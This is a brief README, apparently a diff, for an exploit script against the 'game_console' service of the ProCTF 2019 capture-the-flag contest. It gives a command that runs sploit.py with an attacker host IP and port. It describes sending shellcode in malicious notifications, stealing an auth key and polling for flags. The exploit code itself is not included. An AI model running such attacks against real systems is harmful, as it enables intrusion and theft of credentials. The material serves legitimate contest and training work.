HITB-CyberWeek/proctf-2019/sploits/game_console/README.txt

 To run exploit launch ./sploit.py.
 This script expects as command line arguments IP address of attacker's host and port to open:
 ./sploit.py 10.60.0.6 9999
 Script reads shell.bin, authenticates on server, builds and sends malicious notifications, which contains some message, shell, ip address and port.
-After all it outputs stolen auth key on stdout.

-Use auth key to intercept notifications, some of them contains flag
+After it receives stolen auth key and then enters infinite loop where it asks server for a new notifications, some of them have to contain flags